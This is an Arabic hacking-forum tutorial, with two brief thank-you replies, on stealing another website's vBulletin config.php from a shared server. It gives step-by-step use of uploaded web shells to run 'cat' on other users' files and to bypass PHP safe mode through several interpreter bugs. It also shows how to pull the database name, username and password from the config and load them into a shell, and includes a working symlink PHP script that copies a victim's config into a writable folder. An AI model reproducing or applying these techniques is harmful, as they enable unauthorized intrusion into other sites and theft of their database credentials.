كيف نحصل على بيانات الكونفيق من ثغرات السيرفر !

[center]بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
كيف الحال والأحوال عساكم بخير ان شاء الله اخواني الأعزاء
طال عمركم درسنا في الدروس السابقة عن المسارات
وعرفنا ماهو المنتدى وعرفنا وش الهدف اللي نحتاجه من المنتدى وهو ملف ( [color=red]config.php )
ويكون داخل مجلد includes الموجود داخل مجلد المنتدى !
ومساره كذا
كود:
/home/qloob/public_html/vb/includes/config.php

qloob = اسم مستخدم الموقع المستهدف .
==================================================
اليوم راح نشرح كيف نعرض محتوى ملف config.php واهم البيانات اللي فيه
وكيف نحصل آخر ثغرات الـ php بشكل يدوي هالدرس مهم ويبيله متابعه طال عمركم
==================================================
كيف يتم قراءة ملف config.php ؟؟
من خلال شيل ch99 نروح لخانة الأوامر وننفذ هالأمر
كود:
cat /home/qloob/public_html/vb/includes/config.php
cat = امر قراءة ملف
اما المسار فهو مسار ملف الكونفيق اللي نبي نقراه لاحظوا الصورة :-

ثم راح يعرض لك شاشة فيها الأمر + محتوى ملف config.php لاحظ الصورة :-

الحين نقول اخترقنا المنتدى ووصلنا للقشطة اللي نبيهاا .. كيف نكمل الاستغلال راح تكون
بدروس قادمة بإذن الله .. لكن الحين بكمل الشرح لا تحسبون السالفه لعب عيال
طيب حنا تنفذ معانا الأمر وهذا لسبب واحد لأن السيرفر مقفل خاصية الـ Safe Mode ( الوضع الآمن )
شوفوا الصورة :-

تلاحظون ان السيف مود = Off ( غير مفعل )
وهذا السبب اللي خلانا نقدر ننفذ امر القراءة لاحضار الكونفيق
طيب لنفرض ان السيف مود = On ( مفعل ) مثل هالصورة :-

لو حاولنا ننفذ الأمر ما راح يتنفذ وبيطلع لنا شاشة الأوامر فارغة مثل الصورة :-

باختصار /
ماهو السيف مود أو الوضع الآمن ؟؟
هي خاصية اذا تم تفعيلها فإنها تقوم بعمل اعدادات امنية للسيرفر من بينها منع تنفيذ الأوامر عليه
================================
طيب حنا نبي نقرا الكونفيق و السيف مود قدامنا مسوي لنا مسمار جحا |1|
================================
طيب والحل ؟
الحل يا طويل العمر نشوف لنا ثغرة في أي برنامج بالسيرفر نقدر من خلالها نقرا ملف الكونفيق
ومثل مانتم شايفين بالنت انتشرت الثغرات في برنامج مترجم الـ php بالسيرفر
خاصة الاصدار 4.4.4 ونقدر من خلالها ننفذ امر القراءة ونقرا ملف الكونفيق
ماهو مترجم الـ php ؟؟
هو برنامج يتركب بالسيرفر وظيفته قراءة برمجيات الـ php بالسيرفر من السكريبتات وغيرها
وحنا راح نحاول نطلع ثغرات فيه بحيث اننا نخليه بدل ما يقرا سكريبت ويترجمه لنا
راح نستخدمه ونخليه يقرا الكونفيق ويجيبه لنا بإذن الله
======================================
طبعاً ثغرات الـ php يكتشفونها الأجانب وحنا نترجمها ونجيبها لكم
وتسمعون كل فتره والثانية يقولون لك هذا شيل يتخطى السيف مود
والمقصد انه يتخطى السيف مود وينفذ لنا الأمر cat عن طريق ثغرة في الـ php
انا دمجت لكم اغلب ثغرات الـ php المكتشفه في شيل واحد
ونزلته على الرابط التالي :-
http://www.v99x.com/vb/showthread.php?t=12985
تلاحظون فيه حوالي 8 ثغرات ( شيلات ) لتخطي السيف مود مدموجه في شيل واحد وهو phphacker
وهذا راح يضيع علينا التعب كل اللي علينا نرفع الشيل على السيرفر اللي نبي نتخطاه
ثم شغلوا الشيل راح يطلع لنا بالشكل التالي :-

مثل مانتم شايفين توجد 8 ثغرات لتخطي السيف مود
وهي
ثغرة في الدالة copy في مترجم الـ php .
ثغرة في الدالة ini_restore في مترجم الـ php .
ثغرة في الدالة Curl في مترجم الـ php .
ثغرة في الدالة imap في مترجم الـ php .
ثغرة في الدالة id في مترجم الـ php .
ثغرة في الدالة plugin في مترجم الـ php .
ثغرة في الدالة symlink في مترجم الـ php .
ثغرة في برنامج mysql .
=-=
مثل ما انتم ملاحظين بالصورة انا حاط علامة اكس على ثغرة برنامج mysql
لأن استغلالها يختلف عن استغلال ثغرات الـ php وراح اشرحه بنهاية الدرس بإذن الله
وحاط علامة اكس على ثغرة الدالة symlink وهذي في برنامج php مثل الثغرات الأخرى
ولكن استغلالها يختلف عن الأخريات وراح اشرحه مع ثغرة mysql بنهاية الدرس بإذن الله
=-=
الحين مثل مانتم شايفين الثغرات قدامكم بالصورة جاهزه
كل اللي عليكم تكتبوا مسار الكونفيق في مربع الثغره ثم تضغط زر ( Read-F ) - ( قراءة الملف )
وراح يعرض لكم ملف الكونفيق بإذن الله في حال طلع لكم خطأ جرب الثغره اللي تحتها أو جنبها وهكذا
لاحظ الصورة التالية :-

مثل ما تلاحظون في الصورة انا استخدم ثغرة الدالة ini_restore
في قراءة ملف الكونفيق لموقع قلووب
اول ما تضغط الزر راح يعرض لك الكونفيق اذا ما انعرض لك الكونفيق
هذا يعني ان صاحب السيرفر مرقع الثغره اجل روح جرب اللي تحتها أو اللي جنبها
لين تقرا الكونفيق بإذن الله
========================
شرحنا استغلال ثغرات الـ php فوق ومثل ما شفتم بسيطة جداً ولا تحتاج لتعب
الحين نشرح استغلال ثغرة برنامج mysql في الشيل
طريقتها يا طويل العمر لازم يكون عندك لوحة تحكم سي بنل لموقع
وتسوي قاعدة بيانات
وهذا شرح عمل قاعدة البيانات من السي بنل للمشتركين بدورة اخوي السكربت العربي
http://www.v99x.com/vb/showthread.php?t=15743
وهذا اقتباس الشرح
طيب لنفرض ما عندنا سي بنل وش نسوي ؟؟
الموقع اللي حنا رافعين عليه الشيل شوف سكريبت عليه يعمل بقواعد البيانات
مثلاً سكريبت المنتدى
ادخل واقرا ملف الكونفيق تبعه عن طريق شيل ch99
اول ما تستعرضه بيطلع لك الكونفيق طويل مره
كيف نطلع بيانات قاعدة البيانات اللي هي ( اسم القاعدة + اسم المستخدم + كلمة المرور )
ادخل الكونفيق وابحث عن العبارة التالية :
كود:
$config['Database']['dbname'] =

مثلاً طلع لنا كذا :-
كود:
$config['Database']['dbname'] = 'qllob_vb';

السطر هذا ما يهمنا فيه هو ان اسم قاعدة البيانات هو : qllob_vb
تمام
الحين نبحث عن السطر هذا بعد في الكونفيق
كود:
$config['MasterServer']['username'] =

مثلاً طلع لنا كذا :-
كود:
$config['MasterServer']['username'] = 'qllob_tot';

هذا يعني ان اسم مستخدم قاعدة البيانات هو : qllob_tot
تمام
الحين نبحث عن السطر هذا :-
كود:
$config['MasterServer']['password'] =

مثلاً طلع لنا كذا :-
كود:
$config['MasterServer']['password'] = '123654';

هذا يعني ان كلمة مرور قاعدة البيانات هي : 123654
تماام
تعالوا نشوف البيانات اللي طلعناها
=========================
اسم قاعدة البيانات : qllob_vb
اسم مستخدم قاعدة البيانات : qllob_tot
كلمة مرور قاعدة البيانات : 123654
=========================
تماام جداً والحمد لله
الحين روح لملف الشيل في جهازك وهو phphacker.php
واضغط عليه بزر الماوس الأيمن ثم اختار فتح باستخدام ثم اختار برنامج المفكرة
كما بالصورة :-

الحين راح يفتح لنا السورس كود للشيل
اضغط في الكيبورد على Ctrl + F
وراح يطلع لك شاشة البحث اكتب في المربع العبارة التالية :-
Editing By User
واضغط على زر ( بحث عن التالي )
راح ينزلك تحت عن الخانة اللي نبيها لاحظ الصورة :-

شوفوا الخانات اللي انا مرقمها >> خويتي |9|
ضع في خانة ( $muser ) = " اسم مستخدم قاعدة البيانات "
ضع في خانة ( $mpass ) = " كلمة مرور قاعدة البيانات "
ضع في خانة ( $mdb ) = " اسم قاعدة البيانات "
وحنا مثل ما طلعنا فوق في شرحنا ان قاعدة البيانات اللي عندنا هذي بياناتها
اسم قاعدة البيانات : qllob_vb
اسم مستخدم قاعدة البيانات : qllob_tot
كلمة مرور قاعدة البيانات : 123654
نعبيها في الشيل وراح تصير مثل هالصورة :-

تمااام الحين
في اعلى المفكرة ادل على قائمة ملف ثم حفظ
الحين روح وارفع الشيل على السيرفر ثم اكتب فيه مسار كونفيق اي منتدى تبي تقراه
في خانة ثغرة sql ونفذ الأمر وبإذن الله راح يسحب لك كونفيق المنتدى
وبكذا قدرنا نستغل ثغرة mysql لتخطي السيف مود
الحين نجي لآخر ثغرة وهي ثغرة الدالة symlink
كيف نستغلها ؟
الطريقة طال عمركم
الاستغلال اللي انا مسويه في شيل phphacker صعب شوي
أنا راح أعطيكم اسهل استغلال واقوى استغلال
تفضلوا هذا الشيل
كود:
<?
symlink ("/home/qloob/public_html/vb/includes/config.php","/home/ksa/public_html/file.txt");
?>
انسخ الكود فوق واكتبه في ملف مفكرة ثم ادخل ملف وحفظ بإسم واختار في خانة النوعية : all files
واسم الملف اكتب : sym.php
واحفظه بسطح المكتب
الحين روح سطح المكتب بتلقى ملف شيل بإسم sym.php
افتحه بالمفكرة بنفس الطريقة بزر الماوس الأيمن ثم فتح باستخدام ثم المفكرة
واستبدل هالمسار
كود:
/home/qloob/public_html/vb/includes/config.php

بمسار ملف الكونفيق اللي تبي تقراه
ثم روح شيل ch99 بالموقع وشوف لك مجلد مصرح 777 وادخله
وارفع بداخله ملف مفكرة فارغ بإسم file.txt
وانسخ مساره ( هذا يعتمد على اللي فاهم درس المسارات )
مثلاً حنا داخل هالمسار
كود:
/home/ksa/public_html/images

يعني مجلد images مصرح 777
راح يكون مسار ملف file.txt هو
كود:
/home/ksa/public_html/images/file.txt

ننسخ هالمسار ونلصق بملف الشيل بدل
كود:
/home/ksa/public_html/file.txt

ثم ارفع الشيل sym.php داخل مجلد images او المجلد المصرح 777
وروح شغله عبر المتصفح راح تطلع لك صفحة بيضاء
الحين روح ملف file.txt وافتحه تلقى الكونفيق داخله
عمل الثغره /
انها تنسخ بيانات ملف الكونفيق
ثم تلصقه داخل ملف file.txt
وبكذا نكون استغلينا ثغرة symlink بأفضل طريقة ولله الحمد
كذا انتهينا من هالدرس
والدرس القادم راح يكون بإذن الله عن
ماهو الزند ؟ وكيفية فك تشفيره وكيف تطلع مسار الكونفيق لو تغير .. الخ
=======================================
( هذا الجزء خاص فقط لخبراء الـ php واللغة الانجليزية )
كيف نحصل ثغرات الـ php بنفسنا ؟؟
اغلب ثغرات الـ php مكتشفه من شخص واحد اسمه ماكسيميليان وهذا موقعه
http://securityreason.com/
كل ما يكتشف ثغرة ينزل شرحها مع كيفية الاستغلال ( Exploit ) وكيفية الحماية منها
طبعاً اللي له خبرة في الانجليش وخبرة بسيطة في الـ php
يقدر يقرا الثغرات اللي ينزلها ويكتب استغلالها ببساطة
اول ما تدخلون الصفحة الرئيسية للموقع تقلون آخر ثغرات الـ php المكتشفه مثل الصورة :-

مثل مانتم شايفين فيه 4 ثغرات جديدة
والثغره الأولى تقول لك اصدارات المترجمات المصابه
اضغط عليها واقرا عن الثغره وحاول تكتب استغلال وتتابع الشرح لها بالانجليش
اترك لكم اكتشاف العديد من المزايا .. وفقكم الله
==================================

ميرسي يا حبي على كم المعلومات ده
تسلم ايدك يا مان